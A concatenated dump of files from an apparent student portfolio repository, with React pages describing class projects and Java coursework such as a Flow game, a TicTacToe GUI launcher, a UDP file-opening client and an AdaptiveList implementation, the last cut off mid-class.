ind2geo = np.linalg.inv(np.vstack((geo2ind, [0, 0, 1])))[:2] # inverse matrix
# save transform matrix
np.save("data/geo2ind.npy", geo2ind)
np.save("data/ind2geo.npy", ind2geo)
|
fdec83a398cab7e0f43432163d907a420a899dcd
|
[
"Markdown",
"Python",
"Text"
] | 7
|
Text
|
tdemarcy/annot-boulder-geodata
|
887f9b8ed55ef6f89fd5dabae1868422c37ab56b
|
d604a29f2bbc0d82a5bb57b6c26e8749dec06775
|
refs/heads/master
|
<repo_name>balex654/Portfolio<file_sep>/src/ClassComponents/CPRE288/Lab6/Lab6.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import lab6PNG from './lab6.png';
import lab6C from './Lab6.c';
import ProjectFiles from './lab6.zip';
const Title = Typography.Title;
export default class Lab6 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Analog to Digital Converter - Lab 6</Title>
<Title level={4}>Technology: C, Embedded Systems</Title>
						In this project, my team and I configured the WiFi capability of the robot.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>lab6.c (click on image to download file)</Title>
<a href={lab6C} download="lab6.c">
<img width='100%' src={lab6PNG} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/TransClasses/TransClasses.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ConwayTransformJava from './ConwayTransform.java';
import ConwayTransformPNG from './ConwayTransform.png';
import GridUtil from './GridUtil.java';
import GridUtilSS1 from './GridUtilSS1.png';
import GridUtilSS2 from './GridUtilSS2.png';
import LifeTestJava from './LifeTest.java';
import LifeTestPNG from './LifeTest.png';
import ProjectFiles from './miniAssignment2.zip';
import output from './output.gif';
import SmoothingTransformJava from './SmoothingTransform.java';
import SmoothingTransformPNG from './SmoothingTransform.png';
const Title = Typography.Title;
export default class TransClasses extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Transformation Classes - Assignment 2</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
						This program performs transformation operations, such as a Conway Game of Life step and a smoothing filter, on two-dimensional arrays.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
						<Title level={4}>ConwayTransform.java (click on image to download file)</Title>
<a href={ConwayTransformJava} download="ConwayTransform.java">
<img width='100%' src={ConwayTransformPNG} alt=''/>
</a>
						<Title level={4}>SmoothingTransform.java (click on image to download file)</Title>
<a href={SmoothingTransformJava} download="SmoothingTransform.java">
<img width='100%' src={SmoothingTransformPNG} alt=''/>
</a>
						<Title level={4}>GridUtil.java (click on image to download file)</Title>
<a href={GridUtil} download="GridUtil.java">
<img width='100%' src={GridUtilSS1} alt=''/>
<img width='100%' src={GridUtilSS2} alt=''/>
</a>
						<Title level={4}>LifeTest.java (click on image to download file)</Title>
<a href={LifeTestJava} download="LifeTest.java">
<img width='100%' src={LifeTestPNG} alt=''/>
</a>
<Title level={4}>Output of LifeTest.java</Title>
<img width='50%' src={output} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/ComS319/GameMain.java
package ui;
import java.awt.Color;
import java.awt.Dimension;
import javax.swing.BoxLayout;
import javax.swing.JFrame;
import javax.swing.JPanel;
import javax.swing.SwingUtilities;
import assignment1.TicTacToe;
/**
 * Main class for a GUI for a TicTacToe game; sets up a GamePanel instance in a
 * frame.
*
* @author <NAME>
*/
public class GameMain {
/**
* Line width in pixels.
*/
public static final int LINE_SIZE = 6;
/**
* Font size for displaying score.
*/
public static final int SCORE_FONT = 24;
/**
* Background color.
*/
public static final Color BACKGROUND_COLOR = Color.WHITE;
/**
* Color for grid lines.
*/
public static final Color GRID_COLOR = Color.BLACK;
/**
* Method used for instantiating the components.
*/
private static void create() {
TicTacToe match = new TicTacToe();
ScorePanel scorePanel = new ScorePanel();
GamePanel panel = new GamePanel(scorePanel, match);
ChooseButtonPanel choosePanel = new ChooseButtonPanel(panel, scorePanel);
JPanel mainPanel = new JPanel();
mainPanel.setLayout(new BoxLayout(mainPanel, BoxLayout.Y_AXIS));
mainPanel.add(choosePanel);
mainPanel.add(scorePanel);
mainPanel.add(panel);
JFrame frame = new JFrame("Com S 227 Flow Game");
frame.getContentPane().add(mainPanel);
Dimension d = new Dimension(300, 300);
panel.setPreferredSize(d);
d = new Dimension(300, 100);
scorePanel.setPreferredSize(d);
d = new Dimension(300, 100);
choosePanel.setPreferredSize(d);
frame.pack();
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
frame.setVisible(true);
}
/**
* Main method that initiates the program
* @param args
*/
public static void main(String[] args) {
Runnable r = new Runnable() {
public void run() {
create();
}
};
SwingUtilities.invokeLater(r);
}
}
<file_sep>/src/ClassComponents/ComS227/TallyClass/TallyNumberTest.java
package mini1;
public class TallyNumberTest {
public static void main(String[] args){
TallyNumber t1 = new TallyNumber("| *");
TallyNumber t2 = new TallyNumber("| ** 0 ||");
t1.combine(t2);
System.out.println(t1.getStringValue());
}
}<file_sep>/src/Components/AWSAPI/AWSAPI.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ApplicationJava from './Application.java';
import ApplicationPNG from './Application.png';
import configJava from './config.java';
import configPNG from './Config.png';
import UserJava from './User.java';
import UserPNG from './User.png';
import UserControllerJava from './UserController.java';
import UserControllerPNG from './UserController.png';
import UserRepoJava from './UserRepo.java';
import UserRepoPNG from './UserRepo.png';
const Title = Typography.Title;
export default class AWSAPI extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Amazon Web Services - Web API</Title>
<Title level={4}>Technology: Amazon Web Services, Java, Eclipse, MySQL</Title>
						This project is an example of a simple backend web service hosted on AWS.
I used AWS Codestar to create the server instance and AWS Relational Database Service (RDS)
for the database. I was able to run my project locally while using Amazon's RDS.
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>Application.java (click on image to download file):</Title>
<a href={ApplicationJava} download="Application.java">
<img width='100%' src={ApplicationPNG} alt=''/>
</a>
<Title level={4}>UserController.java (click on image to download file):</Title>
<a href={UserControllerJava} download="UserController.java">
<img width='100%' src={UserControllerPNG} alt=''/>
</a>
<Title level={4}>User.java (click on image to download file):</Title>
<a href={UserJava} download="UserJava.java">
<img width='100%' src={UserPNG} alt=''/>
</a>
<Title level={4}>UserRepo.java (click on image to download file):</Title>
<a href={UserRepoJava} download="UserRepo.java">
<img width='100%' src={UserRepoPNG} alt=''/>
</a>
<Title level={4}>Config.java (click on image to download file):</Title>
<a href={configJava} download="config.java">
<img width='100%' src={configPNG} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/A3/FlowGame.java
package hw3;
import java.util.ArrayList;
import api.Cell;
import api.Flow;
/**
* Game state for a Flow Free game.
*/
public class FlowGame{
	private int width;
	private int height;
	private Flow[] allFlows;
	private Cell current = null;
	private int currentFlowf = 0;
	/**
	 * Constructs a FlowGame to use the given array of Flows and
	 * the given width and height. Client is responsible for ensuring that all
	 * cells in the given flows have row and column values within
	 * the given width and height.
	 * @param givenFlows
	 *   an array of Flow objects
	 * @param givenWidth
	 *   width to use for the game
	 * @param givenHeight
	 *   height to use for the game
	 */
	public FlowGame(Flow[] givenFlows, int givenWidth, int givenHeight){
// TODO
width = givenWidth;
height = givenHeight;
allFlows = givenFlows;
}
/**
* Constructs a FlowGame from the given descriptor.
* @param descriptor
* array of strings representing initial endpoint positions
*/
public FlowGame(String[] descriptor){
// TODO
allFlows = Util.createFlowsFromStringArray(descriptor);
height = descriptor.length;
width = descriptor[0].length();
}
/**
* Returns the width for this game.
* @return
* width for this game
*/
public int getWidth(){
// TODO
return width;
}
/**
* Returns the height for this game.
* @return
* height for this game
*/
public int getHeight(){
// TODO
return height;
}
/**
	 * Returns the current cell for this game, possibly null.
* @return
* current cell for this game
*/
public Cell getCurrent(){
// TODO
return current;
}
/**
* Returns all flows for this game. Client should not modify
* the returned array or lists.
* @return
* array of flows for this game
*/
public Flow[] getAllFlows(){
// TODO
return allFlows;
}
/**
* Returns the number of occupied cells in all flows (including endpoints).
* @return
* occupied cells in this game
*/
public int getCount(){
// TODO
return 0;
}
/**
* Returns true if all flows are complete and all cells are occupied.
* @return
* true if all flows are complete and all cells are occupied
*/
public boolean isComplete(){
// TODO
int numComplete = 0;
for(int i = 0; i < allFlows.length; i++){
if(allFlows[i].isComplete()){
numComplete++;
}
}
for(int i = 0; i < width; i++){
for(int j = 0; j < height; j++){
if(isOccupied(j, i) == false){
return false;
}
}
}
if(numComplete == allFlows.length){
return true;
}
return false;
}
/**
* Attempts to set the "current" cell to be an existing cell at the given
* row and column. When using a GUI, this method is typically
* invoked when the mouse is pressed.
* <ul>
* <li>Any endpoint can be selected as the current cell. Selecting an
* endpoint clears the flow associated with that endpoint.
* <li>A non-endpoint cell can be selected as the current cell only if
* it is the last cell in a flow.
* </ul>
* If neither of the above conditions is met, this method does nothing.
*
* @param row
* given row
* @param col
* given column
*/
public void startFlow(int row, int col){
// TODO
endFlow();
for(int i = 0; i < allFlows.length; i++){
for(int j = 0; j < 2; j++){
if(allFlows[i].getEndpoint(j).positionMatches(row, col)){
allFlows[i].clear();
current = allFlows[i].getEndpoint(j);
currentFlowf = i;
allFlows[i].add(current);
}
}
}
for(int i = 0; i < allFlows.length; i++){
Cell last;
ArrayList<Cell> cells = new ArrayList<Cell>();
cells = allFlows[i].getCells();
if(cells.size() > 0){
last = cells.get(cells.size() - 1);
if(last.getRow() == row && last.getCol() == col){
current = last;
currentFlowf = i;
}
}
}
}
/**
* Clears the "current" cell. That is, directly after invoking this method,
* <code>getCurrent</code> returns null. When using a GUI, this method is
* typically invoked when the mouse is released.
*/
public void endFlow(){
// TODO
current = null;
}
/**
* Attempts to add a new cell to the flow containing the current cell.
* When using a GUI, this method is typically invoked when the mouse is
* dragged. In order to add a cell, the following conditions must be satisfied:
* <ol>
* <li>The current cell is non-null
* <li>The given position is horizontally or vertically adjacent to the
* current cell
* <li>The given position either is not occupied OR it is occupied by
* an endpoint for the flow that is not already in the flow
	 * </ol>
* If the three conditions are met, a new cell with the given row/column
* and correct color is added to the current flow, and the current cell
* is updated to be the new cell.
*
* @param row
* given row for the new cell
* @param col
* given column for the new cell
*/
public void addCell(int row, int col){
// TODO
boolean isEndpoint = false;
for(Flow f : allFlows){ //check to see if position is endpoint
for(int j = 0; j < 2; j++){
if(f.getEndpoint(j).positionMatches(row, col) && f.getColor() == allFlows[currentFlowf].getColor()){
isEndpoint = true;
}
}
}
if(current != null && (isOccupied(row, col) == false || isEndpoint) && allFlows[currentFlowf].isComplete() == false){
if(((current.getCol() - col) <= 1 && (current.getCol() - col) >= -1) && (current.getRow() - row) == 0){
Cell temp = new Cell(row, col, allFlows[currentFlowf].getColor());
current = temp;
allFlows[currentFlowf].add(temp);
}
if(((current.getRow() - row) <= 1 && (current.getRow() - row) >= -1) && (current.getCol() - col) == 0){
Cell temp = new Cell(row, col, allFlows[currentFlowf].getColor());
current = temp;
allFlows[currentFlowf].add(temp);
}
}
}
/**
* Returns true if the given position is occupied by a cell in a flow in
* this game (possibly an endpoint).
* @param row
* given row
* @param col
* given column
* @return
* true if any cell in this game has the given row and column, false otherwise
*/
public boolean isOccupied(int row, int col){
// TODO
for(int i = 0; i < allFlows.length; i++){
for(int j = 0; j < 2; j++){
if(allFlows[i].getEndpoint(j).getRow() == row && allFlows[i].getEndpoint(j).getCol() == col){
return true;
}
}
ArrayList<Cell> currentCells = new ArrayList<Cell>();
currentCells = allFlows[i].getCells();
for(int j = 0; j < currentCells.size(); j++){
if(currentCells.get(j).getRow() == row && currentCells.get(j).getCol() == col){
return true;
}
}
}
return false;
}
}<file_sep>/src/ClassComponents/ComS311/Project2/Project2.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import project2Q1 from './project2Q1.png';
import project2Q1slide from './project2Q1slide.png';
import project2Q2slide1 from './project2Q2slide1.png';
import project2Q2slide2 from './project2Q2slide2.png';
import project2Q2slide3 from './project2Q2slide3.png';
import project2Q2ss1 from './project2Q2ss1.png';
import project2Q2ss2 from './project2Q2ss2.png';
import project2Q3slide1 from './project2Q3slide1.png';
import project2Q3slide2 from './project2Q3slide2.png';
import project2Q3ss1 from './project2Q3ss1.png';
import project2Q3ss2 from './project2Q3ss2.png';
import project2Q4ss1 from './project2Q4ss1.png';
import project2Q4ss2 from './project2Q4ss2.png';
import project2Q4ss3 from './project2Q4ss3.png';
import q1 from './q1.py';
import q2 from './q2.py';
import q4 from './q4.py';
import q5 from './q5.py';
const Title = Typography.Title;
export default class Project2 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>String Matching Algorithms (Word Searching) - Project 2</Title>
<Title level={4}>Technology: Python, Visual Studio Code</Title>
<Title level={2}>Question 1</Title>
						This algorithm finds the longest common substring between two input strings using recursion.
						It uses a top-down recursive approach with a cache that stores previously calculated results
						from the recursive calls. The lecture slide below graphically shows the steps of the algorithm.
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<img width='100%' src={project2Q1slide} alt=''/>
<Title level={4}>q1.py (click on image to download code)</Title>
<a href={q1} download="q1.py">
<img width='100%' src={project2Q1} alt=''/>
</a>
<Title level={2}>Question 2</Title>
						This algorithm is similar to the last one, but it uses a bottom-up approach instead. It first
						fills a table with the lengths of the longest common substrings for every pair of prefixes. Then it
						retrieves the answer by backtracking through the table with the findResult() function.
<img width='100%' src={project2Q2slide1} alt=''/>
<img width='100%' src={project2Q2slide2} alt=''/>
<img width='100%' src={project2Q2slide3} alt=''/>
<Title level={4}>q2.py (click on image to download code)</Title>
<a href={q2} download="q2.py">
<img width='100%' src={project2Q2ss1} alt=''/>
<img width='100%' src={project2Q2ss2} alt=''/>
</a>
<Title level={2}>Question 3</Title>
						The scenario for this problem is that there are two versions of a multi-line text and the
						differences between them need to be tracked. For each line, the algorithm outputs a 'T' for
						transfer, 'D' for delete, 'I' for insert, and 'S' for substitution, followed first by the old
						version of the line and then by the new version. The algorithm finds the edit distance
						between the two versions.
<img width='100%' src={project2Q3slide1} alt=''/>
<img width='100%' src={project2Q3slide2} alt=''/>
<Title level={4}>q3.py (click on image to download code)</Title>
<a href={q4} download="q3.py">
<img width='100%' src={project2Q3ss1} alt=''/>
<img width='100%' src={project2Q3ss2} alt=''/>
</a>
<Title level={2}>Question 4</Title>
						This problem builds on the previous answer and the longest common substring algorithm.
						The output is the same as in the last problem, except that it uses double brackets to mark
						character-level changes within each substituted line.
<Title level={4}>q4.py (click on image to download code)</Title>
<a href={q5} download="q4.py">
<img width='100%' src={project2Q4ss1} alt=''/>
<img width='100%' src={project2Q4ss2} alt=''/>
<img width='100%' src={project2Q4ss3} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/CPRE186/BroadcastClient.java
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
import java.net.MulticastSocket;
import java.util.Scanner;
import java.net.InetSocketAddress;
import javax.swing.JOptionPane;
import javax.swing.JDialog;
import javax.swing.JFrame;
import java.awt.Desktop;
import java.io.File;
public class BroadcastClient {
public static void main(String[] args) {
// TODO Auto-generated method stub
// Scanner in = new Scanner(System.in);
// System.out.println("Enter message to broadcast to all clients:");
// String message = in.nextLine();
// in.close();
String filename = "";
// byte[] sendData = filename.getBytes();
byte[] receiveData = new byte[1000];
try {
DatagramSocket clientSocket = new DatagramSocket(null);
clientSocket.setReuseAddress(true);
clientSocket.bind(new InetSocketAddress(15002));
//System.out.print("\033[2J\033[H");
while(true){
receiveData = new byte[1000];
// send message to server
// InetAddress localhost = InetAddress.getByName("127.0.0.1");
// DatagramPacket sendPacket = new DatagramPacket(sendData, sendData.length, localhost, 15002);
// clientSocket.send(sendPacket);
// receive message from server
DatagramPacket receivePacket = new DatagramPacket(receiveData, receiveData.length);
clientSocket.receive(receivePacket);
filename = new String(receivePacket.getData());
// System.out.println(" " + message);
// JOptionPane.showMessageDialog(null, message, "Message from Server", JOptionPane.PLAIN_MESSAGE);
// final JOptionPane pane = new JOptionPane(message);
// final JDialog d = pane.createDialog((JFrame)null, "Message from Server");
// d.setLocation(50,100);
// d.setVisible(true);
Desktop.getDesktop().open(new File("/Users/benalexander/School/ComS227/cpre186"+filename));
clientSocket.close();
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
<file_sep>/src/ClassComponents/ComS228/Project3/AdaptiveList.java
package edu.iastate.cs228.hw3;
/*
* @author
*
* An implementation of List<E> based on a doubly-linked list with an array for indexed reads/writes
*
*/
import java.lang.reflect.Array;
import java.util.Arrays;
import java.util.Collection;
import java.util.Iterator;
import java.util.List;
import java.util.ListIterator;
import java.util.NoSuchElementException;
/**
*
* @author benalexander
*
* @param <E>
*/
public class AdaptiveList<E> implements List<E> {
/**
*
* @author benalexander
*
*/
public class ListNode // private member of outer class
{
public E data; // public members:
public ListNode link; // used outside the inner class
public ListNode prev; // used outside the inner class
/**
* Constructor for ListNode
* @param item
*/
public ListNode(E item) {
data = item;
link = prev = null;
}
}
public ListNode head; // dummy node made public for testing.
public ListNode tail; // dummy node made public for testing.
private int numItems; // number of data items
private boolean linkedUTD; // true if the linked list is up-to-date.
public E[] theArray; // the array for storing elements
private boolean arrayUTD; // true if the array is up-to-date.
/**
* Default constructor for AdaptiveList
*/
public AdaptiveList() {
clear();
}
/**
* Method is used to initialize the list
*/
@Override
public void clear() {
head = new ListNode(null);
tail = new ListNode(null);
head.link = tail;
tail.prev = head;
numItems = 0;
linkedUTD = true;
arrayUTD = false;
theArray = null;
}
/**
* determines if the linked list is up to date
* @return linkedUTD
*/
public boolean getlinkedUTD() {
return linkedUTD;
}
/**
* determines if the array is up to date
* @return arrayUTD
*/
public boolean getarrayUTD() {
return arrayUTD;
}
/**
* Constructor used for taking a collection as an input
* @param c
*/
public AdaptiveList(Collection<? extends E> c) {
// TODO
head = new ListNode(null);
tail = new ListNode(null);
head.link = tail;
tail.prev = head;
ListNode current = head;
int count = 0;
for (E e : c) {
ListNode toAdd = new ListNode(e);
link(current, toAdd);
current = toAdd;
count++;
}
numItems = count;
linkedUTD = true;
arrayUTD = false;
theArray = null;
}
// Removes the node from the linked list.
// This method should be used to remove a node from the linked list.
private void unlink(ListNode toRemove) {
if (toRemove == head || toRemove == tail)
throw new RuntimeException("An attempt to remove head or tail");
toRemove.prev.link = toRemove.link;
toRemove.link.prev = toRemove.prev;
}
// Inserts new node toAdd right after old node current.
// This method should be used to add a node to the linked list.
private void link(ListNode current, ListNode toAdd) {
if (current == tail)
throw new RuntimeException("An attempt to link after tail");
if (toAdd == head || toAdd == tail)
throw new RuntimeException("An attempt to add head/tail as a new node");
toAdd.link = current.link;
toAdd.link.prev = toAdd;
toAdd.prev = current;
current.link = toAdd;
}
/**
* Used to update theArray if the list and theArray differ
*/
private void updateArray() // makes theArray up-to-date.
{
if (numItems < 0)
throw new RuntimeException("numItems is negative: " + numItems);
if (!linkedUTD)
throw new RuntimeException("linkedUTD is false");
// TODO
ListNode node = head;
theArray = (E[]) new Object[numItems];
for (int i = 0; i < numItems; i++) {
node = node.link;
theArray[i] = node.data;
}
arrayUTD = true;
}
/**
* Used to update the list if theArray and the list differ
*/
private void updateLinked() // makes the linked list up-to-date.
{
if (numItems < 0)
throw new RuntimeException("numItems is negative: " + numItems);
if (!arrayUTD)
throw new RuntimeException("arrayUTD is false");
if (theArray == null || theArray.length < numItems)
throw new RuntimeException("theArray is null or shorter");
// TODO
ListNode node = head;
for (int i = 0; i < theArray.length; i++) {
node = node.link;
node.data = theArray[i];
}
linkedUTD = true;
}
/**
* Returns the number of elements in this list
* @return the number of elements in this list
*/
@Override
public int size() {
// TODO
if(!linkedUTD){
updateLinked();
}
return numItems; // may need to be revised.
}
/**
* Returns true if this list contains no elements
* @return true if this list contains no elements
*/
@Override
public boolean isEmpty() {
// TODO
if(!linkedUTD){
updateLinked();
}
if (head.link == tail) {
return true;
} else {
return false;
}
}
/**
* Appends the specified element to the end of this list
* @return true
* @param e - element to be appended to this list
*/
@Override
public boolean add(E obj) throws NullPointerException, IllegalArgumentException {
// TODO
if(!linkedUTD){
updateLinked();
}
ListNode newNode = new ListNode(obj);
link(tail.prev, newNode);
arrayUTD = false;
numItems++;
return true; // may need to be revised.
}
/**
* Appends all of the elements in the specified collection to the end of this list,
* in the order that they are returned by the specified collection's iterator
* @param c - collection containing elements to be added to this list
* @return true if this list changed as a result of the call
*/
@Override
public boolean addAll(Collection<? extends E> c) throws NullPointerException{
// TODO
if(!linkedUTD){
updateLinked();
}
int before = numItems;
if(!c.isEmpty()){
E[] array = (E[]) c.toArray();
int size = array.length;
for (int i = 0; i < size; i++) {
ListNode newNode = new ListNode(array[i]);
link(tail.prev, newNode);
arrayUTD = false;
numItems++;
}
}
int after = numItems;
if(before == after){
return false;
}
return true; // may need to be revised.
} // addAll 1
/**
* Removes the first occurrence of the specified element from this list, if it is present
* @param o - element to be removed from this list, if present
* @return true if this list contained the specified element
*/
@Override
public boolean remove(Object obj) {
// TODO
if(!linkedUTD){
updateLinked();
}
ListNode current = head;
int size = numItems;
for (int i = 0; i < size; i++) {
current = current.link;
if (current.data == obj) {
unlink(current);
arrayUTD = false;
numItems--;
return true;
}
}
return false;
}
private void checkIndex(int pos) // a helper method
{
if (pos >= numItems || pos < 0)
throw new IndexOutOfBoundsException("Index: " + pos + ", Size: " + numItems);
}
private void checkIndex2(int pos) // a helper method
{
if (pos > numItems || pos < 0)
throw new IndexOutOfBoundsException("Index: " + pos + ", Size: " + numItems);
}
private void checkNode(ListNode cur) // a helper method
{
if (cur == null || cur == tail)
throw new RuntimeException("numItems: " + numItems + " is too large");
}
/**
* find the node in the list at the given position(first element has position 0)
* @param pos
* @return ListNode at pos
*/
private ListNode findNode(int pos) // a helper method
{
ListNode cur = head;
for (int i = 0; i < pos; i++) {
checkNode(cur);
cur = cur.link;
}
checkNode(cur);
return cur;
}
/**
* Inserts the specified element at the specified position in this list
* @param pos - index at which the specified element is to be inserted
* @param obj - element to be inserted
*/
@Override
public void add(int pos, E obj) throws IndexOutOfBoundsException {
// TODO
if (pos < 0 || pos > size()) {
throw new IndexOutOfBoundsException("Index out of bounds");
}
if(!linkedUTD){
updateLinked();
}
if (isEmpty()) {
ListNode node = new ListNode(obj);
link(tail.prev, node);
arrayUTD = false;
numItems++;
} else {
ListNode newNode = new ListNode(obj);
ListNode current = head.link;
for (int i = 0; i < pos; i++) {
current = current.link;
}
link(current.prev, newNode);
arrayUTD = false;
numItems++;
}
}
/**
* Inserts all of the elements in the specified collection into this list at the specified position
* @param index - index at which to insert the first element from the specified collection
* @param c - collection containing elements to be added to this list
* @return true if this list changed as a result of the call
*/
@Override
public boolean addAll(int pos, Collection<? extends E> c) throws NullPointerException, IndexOutOfBoundsException {
// TODO
if (pos < 0 || pos > size()) {
throw new IndexOutOfBoundsException("Index out of bounds");
}
if(!linkedUTD){
updateLinked();
}
if (isEmpty()) {
int before = numItems;
addAll(c);
int after = numItems;
if(before == after){
return false;
}
return true;
}
else {
ListNode current = head;
for (int i = 0; i < pos; i++) {
current = current.link;
}
int before = numItems;
E[] array = (E[]) c.toArray();
int size = array.length;
for (int i = 0; i < size; i++) {
ListNode newNode = new ListNode(array[i]);
link(current, newNode);
arrayUTD = false;
current = newNode;
numItems++;
}
int after = numItems;
if(before == after){
return false;
}
return true;
}
}
/**
* Removes the element at the specified position in this list
* @param index - the index of the element to be removed
* @return the element previously at the specified position
*/
@Override
public E remove(int pos) throws IndexOutOfBoundsException {
// TODO
if (pos < 0 || pos >= numItems) {
throw new IndexOutOfBoundsException("Index is out of bounds");
}
else {
if(!linkedUTD){
updateLinked();
}
arrayUTD = false;
E toRemove = get(pos);
ListNode node = findNode(pos + 1);
unlink(node);
arrayUTD = false;
numItems--;
return toRemove;
}
}
/**
* Returns the element at the specified position in this list.
* @param index - index of the element to return
* @return the element at the specified position in this list
*/
@Override
public E get(int pos) throws IndexOutOfBoundsException {
// TODO
if (pos < 0 || pos >= numItems) {
throw new IndexOutOfBoundsException("Index is out of bounds");
} else {
if (arrayUTD) {
return theArray[pos];
}
else {
updateArray();
return theArray[pos];
}
}
}
/**
* Replaces the element at the specified position in this list with the specified element
* @param index - index of the element to replace
* @param element - element to be stored at the specified position
* @return the element previously at the specified position
*/
@Override
public E set(int pos, E obj) throws IndexOutOfBoundsException {
// TODO
if (pos < 0 || pos >= numItems) {
throw new IndexOutOfBoundsException("Index is out of bounds");
}
else {
if(!arrayUTD){
updateArray();
}
linkedUTD = false;
E e = theArray[pos];
theArray[pos] = obj;
return e;
}
}
/**
* If the number of elements is at most 1, the method returns false.
* Otherwise, it reverses the order of the elements in the array
* without using any additional array, and returns true.
* Note that if the array is modified, then linkedUTD needs to be set to
* false.
* @return true if theArray changed
*/
public boolean reverse() {
// TODO
if (numItems <= 1) {
return false;
}
else {
if(!arrayUTD){
updateArray();
}
linkedUTD = false;
for (int i = 0; i < numItems / 2; i++) {
				// use length - 1 - i so the swap stays within the array bounds
				E temp = theArray[theArray.length - 1 - i];
				theArray[theArray.length - 1 - i] = theArray[i];
theArray[i] = temp;
}
return true;
}
}
/**
* Returns true if this list contains the specified element
* @param o - element whose presence in this list is to be tested
* @return true if this list contains the specified element
*/
@Override
public boolean contains(Object obj) {
// TODO
if(!linkedUTD){
updateLinked();
}
ListNode node = head;
for (int i = 0; i < numItems; i++) {
node = node.link;
if (node.data == obj) {
return true;
}
}
return false;
}
/**
* Returns true if this list contains all of the elements of the specified collection.
* @param c - collection to be checked for containment in this list
* @return true if this list contains all of the elements of the specified collection
*/
@Override
public boolean containsAll(Collection<?> c) throws NullPointerException {
// TODO
if (c == null) {
throw new NullPointerException("Given collection is null");
}
else {
if(!linkedUTD){
updateLinked();
}
if(c.isEmpty() && head.link == tail){
return true;
}
for (Object e : c) {
if (!contains(e)) {
return false;
}
}
return true;
}
}
/**
* Returns the index of the first occurrence of the specified element in this
* list, or -1 if this list does not contain the element.
* @param o - element to search for
* @return the index of the first occurrence of the specified element in this
* list, or -1 if this list does not contain the element
*/
@Override
public int indexOf(Object obj) {
// TODO
if(!linkedUTD){
updateLinked();
}
for (int i = 0; i < numItems; i++) {
if (obj.equals(get(i))) {
return i;
}
}
return -1;
}
/**
* Returns the index of the last occurrence of the specified element in this
* list, or -1 if this list does not contain the element.
* @param o - element to search for
* @return the index of the last occurrence of the specified element in this
* list, or -1 if this list does not contain the element
*/
@Override
public int lastIndexOf(Object obj) {
// TODO
if(!linkedUTD){
updateLinked();
}
int last = -1;
for (int i = 0; i < numItems; i++) {
if (obj.equals(get(i))) {
last = i;
}
}
if (last == -1) {
return -1;
} else {
return last;
}
}
/**
* Removes from this list all of its elements that are contained in the specified collection
* @param c - collection containing elements to be removed from this list
* @return true if this list changed as a result of the call
*/
@Override
public boolean removeAll(Collection<?> c) {
// TODO
if(!linkedUTD){
updateLinked();
}
boolean changed = false;
if(c.size() == 0){
return changed;
}
for (Object o : c) {
ListNode current = head;
int numRemoved = 0;
for(int i = 0; i < numItems; i++){
current = current.link;
if(o == current.data){
unlink(current);
arrayUTD = false;
numRemoved++;
changed = true;
}
}
numItems = numItems - numRemoved;
}
return changed;
}
/**
* Retains only the elements in this list that are contained in the specified collection
* @param c - collection containing elements to be retained in this list
* @return true if this list changed as a result of the call
*/
@Override
public boolean retainAll(Collection<?> c) throws NullPointerException{
// TODO
if(c == null){
throw new NullPointerException("Given collection is null");
}
if(!linkedUTD){
updateLinked();
}
boolean changed = false;
ListNode current = head;
for(int i = 0; i < numItems; i++){
current = current.link;
boolean inList = false;
for(Object e : c){
if(current.data == e){
inList = true;
}
}
if(!inList){
ListNode node = head;
int numRemoved = 0;
for(int j = 0; j < numItems; j++){
node = node.link;
if(current == node){
unlink(current);
arrayUTD = false;
numRemoved++;
changed = true;
}
}
numItems = numItems - numRemoved;
}
}
return changed;
}
/**
* Returns an array containing all of the elements in this list in proper sequence
* @return an array containing all of the elements in this list in proper sequence
*/
@Override
public Object[] toArray() {
// TODO
if(!linkedUTD){
updateLinked();
}
ListNode current = head;
Object[] array = new Object[numItems];
for (int i = 0; i < numItems; i++) {
current = current.link;
array[i] = current.data;
}
return array; // may need to be revised.
}
/**
* Returns an array containing all of the elements in this list in proper sequence
* (from first to last element); the runtime type of the returned array is that of the
* specified array. If the list fits in the specified array, it is returned therein.
* Otherwise, a new array is allocated with the runtime type of the specified array and
* the size of this list.
* @param a - the array into which the elements of this list are to be stored,
* if it is big enough; otherwise, a new array of the same runtime type is allocated
* for this purpose.
	 * @return an array containing the elements of this list
*/
@Override
public <T> T[] toArray(T[] arr) throws NullPointerException {
// TODO
if(!linkedUTD){
updateLinked();
}
if (arr == null) {
throw new NullPointerException("Given array is null");
}
else if (arr.length == numItems) {
ListNode current = head;
for (int i = 0; i < numItems; i++) {
current = current.link;
arr[i] = (T) current.data;
}
return arr;
}
else if (arr.length < numItems) {
ListNode current = head;
final T[] array = (T[]) Array.newInstance(arr.getClass().getComponentType(), numItems);
for (int i = 0; i < numItems; i++) {
current = current.link;
array[i] = (T) current.data;
}
return array;
}
else if (arr.length > numItems){
ListNode current = head;
for (int i = 0; i < numItems; i++) {
current = current.link;
arr[i] = (T) current.data;
if(i == numItems - 1){
arr[i + 1] = null;
}
}
return arr;
}
else {
return null;
}
}
@Override
public List<E> subList(int fromPos, int toPos) {
throw new UnsupportedOperationException();
}
/**
*
* @author benalexander
*
*/
private class AdaptiveListIterator implements ListIterator<E> {
private int index; // index of next node;
